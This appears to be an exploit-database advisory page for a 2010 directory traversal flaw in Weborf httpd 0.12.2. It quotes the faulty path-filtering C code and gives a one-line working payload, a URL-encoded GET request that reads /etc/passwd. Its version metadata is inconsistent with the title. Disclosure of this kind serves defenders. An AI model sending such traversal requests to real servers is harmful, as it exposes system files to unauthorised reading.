header-logo
Suggest Exploit
vendor:
Weborf httpd
by:
Rew
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Weborf httpd
Affected Version From: 0.0.0
Affected Version To: 2000.12.2
Patch Exists: NO
Related CWE:
CPE: a:weborf:httpd:0.12.2
Metasploit:
Other Scripts:
Platforms Tested: Debian 5
2010

Weborf httpd <= 0.12.2 Directory Traversal Vulnerability

Weborf httpd <= 0.12.2 suffers a directory traversal vulnerability. This vulnerability could allow attackers to read arbitrary files.

Mitigation:

Update to a version higher than 0.12.2.
Source

Exploit-DB raw data:

Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author:	Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A

=============================================================

Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability.  This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.

instance.c : line 240-244
------------------------------
void modURL(char* url) {
    //Prevents the use of .. to access the whole filesystem  <-- ORLY?
    strReplace(url,"../",'\0');

    replaceEscape(url);
------------------------------

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

==============================================================

Stay safe,
Over and Out

Navigation

Suggest Exploit

Services By CQR